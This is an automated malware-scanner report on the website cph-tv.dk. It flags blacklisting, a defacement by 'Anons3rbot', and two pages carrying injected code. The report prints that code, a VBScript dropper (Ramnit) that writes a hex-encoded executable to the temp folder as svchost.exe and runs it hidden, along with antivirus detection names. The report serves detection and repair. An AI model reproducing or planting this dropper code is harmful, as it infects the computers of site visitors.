Malware Scanner report for cph-tv.dk

Malicious/Suspicious/Total urls checked: 2/0/2

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "cph-tv.dk" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: Found

Probably the website is defaced. The following signature was found:

Hacked By Anons3rbot (3 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cph-tv.dk

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.cph-tv.dk/	200 OK Content-Length: 115566 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ... 3078 bytes are skipped ...7696E48656C705700000000000000000000" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.cph-tv.dk/test404page.js	200 OK Content-Length: 115566 Content-Type: text/html	suspicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ... 3078 bytes are skipped ...7696E48656C705700000000000000000000" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q Deface/Content modification. The following signature was found: Hacked By Anons3rbot <html> <head> <meta http-equiv="Content-Language" content="fr"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Hacked By Anons3rbot</title> <meta name="keywords" content="Anons3rbot"> <meta name="description" content="Anons3rbot"> </head> <body style="background-color:black; text-align:center;"> <p align="center"><font style="color:red; font-size:50px;">Anons3rbot Team</font></b><br /> <img border="0" src="http://img5013.photobox.co.uk/9601881558737d8694a75f003 ...[115781 bytes skipped]...

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cph-tv.dk

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: cph-tv.dk
Referer: http://www.google.com/search?q=cph-tv.dk

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for cph-tv.dk

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools